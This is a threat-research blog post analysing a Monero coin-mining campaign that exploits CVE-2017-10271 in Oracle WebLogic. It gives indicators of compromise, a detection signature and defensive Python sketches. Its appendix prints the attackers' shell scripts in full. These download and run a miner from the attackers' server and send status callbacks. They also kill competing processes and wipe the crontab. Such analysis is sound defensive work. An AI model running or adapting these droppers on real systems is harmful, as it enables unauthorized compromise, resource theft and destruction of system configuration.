Threat Research / January 12, 2018

Coin Mining by Opportunistic and Automated Threats

With the recent surge in popularity and increasing value of cryptocurrency, it should be no surprise that financially motivated threat actors have begun leveraging their victims to contribute to “mining” efforts, where the computing resources of the victim are used to generate cryptocurrency for the threat actor. To succeed in making a large profit, the actors must continually compromise a large number of victims and utilize significant computing resources. This demand for mass compromise has forced these threat actors to adopt automated methods that rely on opportunistic exploitation to outpace defenders, increasing the number of victims as quickly as possible with minimal cost.

While the business impact of coin mining seems minimal on the surface, having an unauthorized party in control of systems you own introduces a dangerous wild card. Is it really a criminal performing coin mining or is that a disguise? What will they do with the access if coin mining is no longer profitable? The Gigamon Applied Threat Research (ATR) team has witnessed incidents stemming from criminals who decided to sell their access to other parties, and the increasingly common malware-as-a-service scheme contributes to the risk from “simple” coin mining. Simply stated, criminal post-exploitation has become an efficient and widespread business that poses a threat to all enterprises, especially those with a significant and historical internet footprint that may contain undocumented or obsolete systems and pages. In this post, we will provide a walkthrough of an attack campaign that the Gigamon ATR team has witnessed in the wild over the past several weeks and break down some key lessons learned from the attack.

Attack Walkthrough

Exploitation

Attackers primarily rely on opportunistic exploitation of well-known (and signatured) vulnerabilities in applications running on internet-connected systems, and exhibit complete disregard for stealth or disguise. Throughout the recently observed campaign, attackers originating from multiple source addresses (191.101.180[.]84, 72.11.140[.]178) leveraged CVE-2017-10271, a Java deserialization vulnerability in the Oracle WebLogic Server, to target outdated servers (Figure 1). Java deserialization vulnerabilities are not unique to Oracle, and plague several older versions of WebSphere, JBoss, Jenkins, OpenNMS, etc. In this class of vulnerability, server software attempts to deserialize untrusted content without validation, allowing an attacker to abuse the application for code execution.

Figure 1: Connections from an external untrusted entity with suspicious referrer to an exposed vulnerable Oracle WebLogic endpoint.

Tool Staging

Following exploitation of the system, the threat actor downloads and executes a shell script from their command and control (C2) server using Wget. Throughout the campaign, we observed several variations of the same tool (Table 1), each progressively adding capabilities or cleanup mechanisms. This indicates the possibility that the tool is either a public script that is getting reused and built upon, or that this campaign is more far-reaching than the Gigamon ATR team has independently observed to this point.

Identifier | Hosted URL | SHA1 Hash
Version A | http://72.11.140[.]178/setup-watch | df62241026a96cda6057d894000de8ed70b3b666
Version B | http://191.101.180[.]84:80/robots.txt | 4c3f1cc052f7216447df8954a55e373bdf2ecefc
Table 1: Versions of scripts seen by the Gigamon ATR team in recent campaigns.

In Version B, the Gigamon ATR team has observed that the script performs two major actions: cleanup and staging of tools. During the cleanup routine, the script makes extensive attempts to prevent multiplicative effects, killing active processes of previously running code, other coin miners on the system, or system utilities that might be used to detect the activity. During the staging phase, the script runs two similar routines that download two different files from different URIs, give them executable permissions, and attempt to execute them. Both files are downloaded to the path ‘/tmp/xfsallocd’. The script sends a follow-on signal to the controller via an HTTP request from the download utility to a specific URI to indicate whether the file was already running or successfully started. Figure 2 shows the complete network staging process without the signal for successful execution. For a complete review of the source code, please reference Appendix B.

Figure 2: Complete staging process without execution signal.

Profit

The executable binaries that are downloaded during staging are publicly known and identified Monero coin miners (Table 2). Analysis of the binaries shows they are using the standard stratum connection string “stratum+tcp://pool.minexmr.com:80” with a wallet ID of “4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeTE6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe”. Analysis of the wallet associated with this activity shows that the threat actor/s have been paid out a total of 603.535663865 XMR, which, at the current exchange rate, equates to approximately $260,000 (note that, with cryptocurrency price fluctuations, this number is purely a point-in-time estimate).

Download URI | Local File Name | SHA Hash
$HOST/files/l/default | /tmp/xfsallocd, /tmp/watch-smartd | f79a2ba735a988fa6f65988e1f3d39684727bdc4
$HOST/files/l/others | /tmp/xfsallocd, /tmp/watch-smartd | 7c57c61664f2b2373f755f22db9c156a1ca80849
Table 2: Binaries that have been observed staging during the campaign.

It is also worth noting that as of Jan 4, 2017, AlienVault published a signature to the public Emerging Threats feed (Figure 3) to identify activity with the associated wallet ID for this threat actor.

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS CoinMiner Malicious Authline Seen After CVE-2017-10271 Exploit"; flow:established,to_server; content:"{|22|id|22 3A|"; depth:6; content:"|22|method|22 3a 20 22|mining.authorize|22 2c|"; within:100; content:"|22|params|22|"; within:50; content:"|5b 22|4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeTE6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe|22 2c 20 22|"; distance:0; metadata: former_category CURRENT_EVENTS; reference:url,otx.alienvault.com/pulse/5a4e1c4993199b299f90a212; classtype:trojan-activity; sid:2025186; rev:1; metadata:attack_target Web_Server, deployment Datacenter, signature_severity Major, created_at 2018_01_04, malware_family CoinMiner, performance_impact Low, updated_at 2018_01_04;)

Figure 3: Emerging Threats Signature ID 2025186.
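The signature in Figure 3 matches one wallet with fixed byte patterns. The sketch below is an added example, not part of the original post or the Emerging Threats rule set: it parses each line of a client-to-server TCP payload as JSON, so it reports any Stratum login regardless of spacing, and it goes beyond the rule by also covering the "login" form of the handshake. The function names, the watchlist structure and the sample session are assumptions made for illustration.

```python
import json

# Wallet ID reported in this post; extend the set with other known-bad logins.
ACTOR_WALLET = ("4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeT"
                "E6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe")
WATCHLIST = {ACTOR_WALLET}

# "mining.authorize" is the method the signature keys on; "login" is the
# object-style variant used by many Monero miners (added generalization).
AUTH_METHODS = {"mining.authorize", "login"}


def extract_login(msg):
    """Return the miner login from one decoded Stratum message, or None."""
    if not isinstance(msg, dict) or msg.get("method") not in AUTH_METHODS:
        return None
    params = msg.get("params")
    if isinstance(params, list) and params:    # ["<login>", "<password>"]
        login = params[0]
    elif isinstance(params, dict):             # {"login": ..., "pass": ...}
        login = params.get("login")
    else:
        return None
    return login if isinstance(login, str) else None


def scan_payload(payload):
    """Scan client-to-server TCP payload bytes for Stratum logins.

    Returns a list of dicts with keys "method", "login" and "watchlisted".
    """
    findings = []
    for raw in payload.splitlines():
        raw = raw.strip()
        if not raw.startswith(b"{"):
            continue
        try:
            msg = json.loads(raw.decode("utf-8", errors="replace"))
        except ValueError:
            continue  # not JSON: ordinary traffic or a truncated segment
        login = extract_login(msg)
        if login is None:
            continue
        # Some pools let miners append ".worker" or "+difficulty" to the
        # wallet, so compare only the wallet part against the watchlist.
        wallet = login.split(".", 1)[0].split("+", 1)[0]
        findings.append({"method": msg["method"], "login": login,
                         "watchlisted": wallet in WATCHLIST})
    return findings


# Constructed sample session (not captured traffic).
CONSTRUCTED_SESSION = b"\n".join([
    b'{"id": 1, "method": "mining.subscribe", "params": []}',
    b'{"id": 2, "method": "mining.authorize", "params": ["'
    + ACTOR_WALLET.encode() + b'", "x"]}',
    b'{"id": 1, "method": "login", "params": '
    b'{"login": "CONSTRUCTED_WALLET.rig1", "pass": "x"}}',
    b"GET / HTTP/1.1",
])

if __name__ == "__main__":
    for finding in scan_payload(CONSTRUCTED_SESSION):
        print(finding)
```

A login that is not on the watchlist is still worth an alert when the source is a server that has no business speaking Stratum.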

Analysis

As part of our investigations, the Gigamon ATR team’s analysts were able to identify additional related activity across our customer space and in the public domain. The primary points of pivot were signatures developed to match the Linux scripts, infrastructure analysis, open source intelligence gathering, and the wallet ID tied to the threat actor observed in the aforementioned campaign. By pivoting on these indicators, the Gigamon ATR team discovered the following:

  • Fourteen additional Linux shell script variants that had variations of the downloader string, host IP address, and coin miner file paths
  • Three variants of Windows PowerShell scripts that mirror the functionality of the observed Linux scripts
  • Two additional servers performing exploitation activity
  • Thirteen Windows XMRig coin miner variants customized for this campaign

All indicators discovered during this activity are provided and identified in Appendix A.

Lessons Learned

It is easy to look at this relatively simple activity and judge the attackers' tradecraft as almost too simple for an enterprise to be susceptible to it. However, criminals are able to compromise a large number of victims and profit from the activity. The above illustrates once again that:

  • Visibility and knowledge of your internet footprint is vital
  • Multi-layered detection strategies provide a robust means to discover malicious activity
  • Forensics and root cause analysis are critical for long term continuity of business operations during incidents

Visibility and Knowledge of Your Internet Footprint Is Vital

If the successful exploitation of outdated and exposed assets provides the threat actor a form of revenue, it is likely they will continue to use these techniques. Knowledge of your asset inventory, application versioning, and attack surface will help you to better prevent, detect, and respond. In the case of many outdated or legacy *nix-based systems, it is unlikely that any sort of endpoint detection or response software will be supported, increasing the need for widespread network visibility and accountability over these endpoints.

Multi-Layered Detection Strategies Provide a Robust Means to Discover Malicious Activity

Simply alerting on the IOCs provided in this post will serve as an initial layer of detection, but organizations should strive for more reliable indicators of malicious activity. In the case of this specific incident, there are numerous key detection points. Examples of these include:

  • Atomic Indicators: Threat intelligence matching on the servers, threat intel matching on the downloaded binaries, coin mining network activity, etc.
  • Complex Indicators: Executables downloaded with a suspicious user-agent, interaction with internet-exposed systems from “newly observed” low-reputation entities, executables downloaded immediately following an exploit attempt, etc.
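
One way to express the complex indicators above as correlation logic, added here as an example that is not part of the original post: flag a monitored server that, shortly after an inbound request from an external host, uses a download utility to pull content back from that same host. The event schema, the 300-second window and the sample events are assumptions; the URIs in the sample come from the scripts in Attachment B.

```python
import re
from collections import defaultdict

WINDOW = 300                                    # seconds (assumed window)
TOOL_UA = re.compile(r"^(wget|curl)/", re.I)    # download-utility user-agents
CALLBACK = re.compile(r"^/\?info=l\d+$")        # status callback in Attachment B
EXEC_MAGIC = (b"\x7fELF", b"MZ")                # ELF and PE file headers


def correlate(events, window=WINDOW):
    """Correlate inbound contact with follow-on outbound downloads.

    Each event is a dict (hypothetical schema): ts (epoch seconds),
    direction ("in" = external peer to server, "out" = server to peer),
    server, peer, uri, user_agent, body_head (first response bytes).
    Returns {(server, peer): [reason, ...]} in time order.
    """
    last_inbound = {}
    alerts = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["server"], ev["peer"])
        if ev["direction"] == "in":
            last_inbound[key] = ev["ts"]
            continue
        seen = last_inbound.get(key)
        if seen is None or ev["ts"] - seen > window:
            continue  # no recent inbound contact from this peer
        if not TOOL_UA.match(ev.get("user_agent", "")):
            continue  # not fetched with a command-line download utility
        if ev.get("body_head", b"").startswith(EXEC_MAGIC):
            alerts[key].append("executable download")
        elif CALLBACK.match(ev.get("uri", "")):
            alerts[key].append("status callback")
        else:
            alerts[key].append("script or data download")
    return dict(alerts)


def ev(ts, direction, server, peer, uri, ua="", head=b""):
    """Build one event in the hypothetical schema above."""
    return {"ts": ts, "direction": direction, "server": server, "peer": peer,
            "uri": uri, "user_agent": ua, "body_head": head}


WGET = "Wget/1.12 (linux-gnu)"
SRV = "10.0.0.5"
# Constructed events using documentation address ranges (not real traffic).
CONSTRUCTED_EVENTS = [
    ev(100, "in", SRV, "198.51.100.20", "/"),
    ev(1000, "in", SRV, "203.0.113.10", "/"),
    ev(1002, "out", SRV, "203.0.113.10", "/robots.txt", WGET, b"export PATH"),
    ev(1004, "out", SRV, "203.0.113.10", "/files/l/default", WGET, b"\x7fELF\x02"),
    ev(1009, "out", SRV, "203.0.113.10", "/?info=l60", WGET),
    # No inbound contact from this peer: routine package fetch, not flagged.
    ev(1010, "out", SRV, "198.51.100.7", "/repo/pkg", WGET, b"\x7fELF\x02"),
    # Inbound contact was 4900 seconds earlier: outside the window.
    ev(5000, "out", SRV, "198.51.100.20", "/update", WGET, b"\x7fELF\x02"),
]

if __name__ == "__main__":
    for pair, reasons in correlate(CONSTRUCTED_EVENTS).items():
        print(pair, reasons)
```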

Forensics and Root Cause Analysis Are Critical for Long Term Continuity of Business Operations During Incidents

Even if successfully detected, a failure to contain or remediate the activity will likely lead to continued exploitation. In the case of interactive threat actors, an incomplete remediation will also provide a significant tip-off of your knowledge of their presence. Consider the scenario where you detect the activity, perform forensics to validate that no additional exploitation has occurred, and move to reimage the system for business continuity. Proper removal can be a time consuming and intricate process that may be best handled by bringing in an Incident Response team to ensure complete remediation.

Gigamon Insight is a network security analytics solution that offers a SaaS capability that enables customers to gain and utilize widespread network visibility for security operations. As part of its research, the Gigamon ATR team coordinates disclosure of security threats and vulnerabilities with relevant parties in order to maximize both the response and victim remediation efforts as well as working to truly improve the security of customers and other victims prior to publishing blog posts. To learn more about the Gigamon ATR team, please visit www.gigamon.com/research/applied-threat-research-team.html.

Attachment A: Indicators of Compromise

Indicator | Type | Description
72.11.140[.]178 | IP Address | Server for exploitation and tool staging observed by ICEBRG
72.11.140[.]179 | IP Address | Server for exploitation and tool staging identified via secondary analysis
72.11.140[.]180 | IP Address | Server for exploitation and tool staging identified via secondary analysis
191.101.180[.]84 | IP Address | Server for exploitation and tool staging identified via secondary analysis
/files/l/default | URI | URI of “default” coin mining malware
/files/l/others | URI | URI of “others” coin mining malware
carbon | Filename | Name of downloaded file, typically in /tmp or working dir
infoed | Filename | Name of downloaded file, typically in /tmp or working dir
ksxworker | Filename | Name of downloaded file, typically in /tmp or working dir
rcp_bh | Filename | Name of downloaded file, typically in /tmp or working dir
watch_smartd | Filename | Name of downloaded file, typically in /tmp or working dir
xfsallocd | Filename | Name of downloaded file, typically in /tmp or working dir
xlog-daemon | Filename | Name of downloaded file, typically in /tmp or working dir
auto-upgrade.exe | Filename | Windows filename for XMRig. Stored in path ‘$env:TMP’
/files/w/default | URI | URI of hosted “default” XMRig binary for Windows
/files/w/others | URI | URI of hosted “other” XMRig binary for Windows

Differential Analysis of Linux Shell Scripts

SHA1 Hash | Downloader | Host | Local File
9c2d266e880848a3f08dcceee0d27a660c521ac5 | curl | 72.11.140[.]178 | /tmp/rcp_bh
ca9fad2fe12b5231ae42f507afbb00a742b2e3d2 | wget -q -O - | 72.11.140[.]178 | /tmp/infoed
abc8be4e557107e80c1c342b7505dd3d2e47ef7f | wget -q -O - | 191.101.180[.]84 | `pwd`/xfsallocd, /tmp/xfsallocd
e843c894d837a41f5f9f2bcf932d1c5e49afe08b | wget -q -O - | 191.101.180[.]84 | `pwd`/xfsallocd, /tmp/xfsallocd
07133903f1c38e653e39f9877dca9575699e807d | wget -q -O - | 72.11.140[.]178 | /tmp/carbon
68039309925c8804fa745173cc8805938f3e3184 | curl | 72.11.140[.]178 | /tmp/infoed
25c804e082a4adc01bfcbc19704f541c7026fa9b | wget -q -O - | 72.11.140[.]180 | `pwd`/xlog-daemon
0b4f904cebd469abff43f0457ab6a77466453173 | wget -q -O - | 72.11.140[.]178 | /tmp/rcp_bh
c0b76bca13da6989f05c4aeac59029c3987d7f98 | wget -q -O - | 191.101.180[.]84 | `pwd`/xfsallocd, /tmp/xfsallocd
3909125fd2ddca0aff8130115ef8b870e508e795 | curl | 191.101.180[.]84 | /tmp/xfsallocd
348d1b3a54dc89250531258fe822e3a948dbc071 | wget -q -O - | 72.11.140[.]178 | `pwd`/rcp_bh
b4771410fe5bf3825df41735820aeaeff3c685bb | curl | 72.11.140[.]178 | /tmp/infoed
13736cfc4df64a9890c4474f0003a54a8b72ffe2 | curl | 72.11.140[.]178 | `pwd`/rcp_bh
5249dadfea25acaeb66a0f1798ac2f09a41f2449 | wget -q -O - | 72.11.140[.]179 | /tmp/ksxworker
df62241026a96cda6057d894000de8ed70b3b666 | wget -q -O - | 72.11.140[.]178 | /tmp/watch-smartd
4c3f1cc052f7216447df8954a55e373bdf2ecefc | wget -q -O - | 191.101.180[.]84 | /tmp/xfsallocd

Attachment B: Script Source Code

Version A

HOST=72.11.140.178
CALLBACK=$HOST
# DOWNLOADER="curl "
DOWNLOADER="wget -q -O - "
DEFAULT_RFILE=$HOST/files/l/default
OTHERS_RFILE=$HOST/files/l/others
LFILE_NAME="watch-smartd"
# LFILE_PATH=`pwd`/$LFILE_NAME
LFILE_PATH=/tmp/$LFILE_NAME
DEFAULT ()
{
 $DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH
 chmod +x $LFILE_PATH
 ps -ef|grep $LFILE_NAME|grep -v grep
 if [ $? -ne 0 ]; then
   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"
 else
   $DOWNLOADER "${CALLBACK}/?info=l69"
 fi
}
OTHERS ()
{
 $DOWNLOADER $OTHERS_RFILE > $LFILE_PATH
 chmod +x $LFILE_PATH
 ps -ef|grep $LFILE_NAME|grep -v grep
 if [ $? -ne 0 ]; then
   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"
 else
   $DOWNLOADER "${CALLBACK}/?info=l39"
 fi
}
DEFAULT || OTHERS

Version B

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
HOST=191.101.180.84
CALLBACK=$HOST
# DOWNLOADER="curl "
DOWNLOADER="wget -q -O - "
LFILE_NAME="xfsallocd"
# LFILE_PATH=`pwd`/$LFILE_NAME
LFILE_PATH=/tmp/$LFILE_NAME
DEFAULT_RFILE=$HOST/files/l/default
OTHERS_RFILE=$HOST/files/l/others
CLEAN ()
{
 RMLIST=(/tmp/*index_bak* /tmp/*httpd.conf* /tmp/*httpd.conf /tmp/a7b104c270 /tmp/Carbon)
 KILIST=(sb1 wipefs AnXqV.yam zhuabcn@yahoo.com monerohash.com /tmp/a7b104c270 stratum.f2pool.com:8888 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8 46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe xmrpool.eu mine.moneropool.com xmr.crypto-pool.fr:8080 xmr.crypto-pool.fr:3333 xmr.crypto-pool.fr:6666 xmr.crypto-pool.fr:7777 xmr.crypto-pool.fr:443)
 for item in ${RMLIST[@]}
 do
     rm -rf $item
 done
 for item in ${KILIST[@]}
 do
     ps auxf|grep -v grep|grep $item|awk '{print $2}'|xargs kill -9
 done
 days=$(($(date +%s) / 60 / 60 / 24))
 ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "Silence"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "t.sh"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "wipefs"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "carbon"|awk '{print $2}'|xargs kill -9
 pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
 pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
 pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
 pkill -f cpuloadtest
 pkill -f crypto-pool
 pkill -f xmr
 pkill -f prohash
 pkill -f monero
 pkill -f miner
 pkill -f nanopool
 pkill -f minergate
 pkill -f yam
 pkill -f Silence
 pkill -f yam2
 pkill -f minerd
 pkill -f Circle_MI.png
 pkill -f curl
 ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWzUdrADDu"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "11231"|awk '{print $2}'|xargs kill -9
}
DEFAULT ()
{
 $DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH
 chmod +x $LFILE_PATH
 ps -ef|grep $LFILE_NAME|grep -v grep
 if [ $? -ne 0 ]; then
   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"
 else
   $DOWNLOADER "${CALLBACK}/?info=l69"
 fi
}
OTHERS ()
{
 $DOWNLOADER $OTHERS_RFILE > $LFILE_PATH
 chmod +x $LFILE_PATH
 ps -ef|grep $LFILE_NAME|grep -v grep
 if [ $? -ne 0 ]; then
   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"
 else
   $DOWNLOADER "${CALLBACK}/?info=l39"
 fi
}
CLEAN
DEFAULT || OTHERS
crontab -r
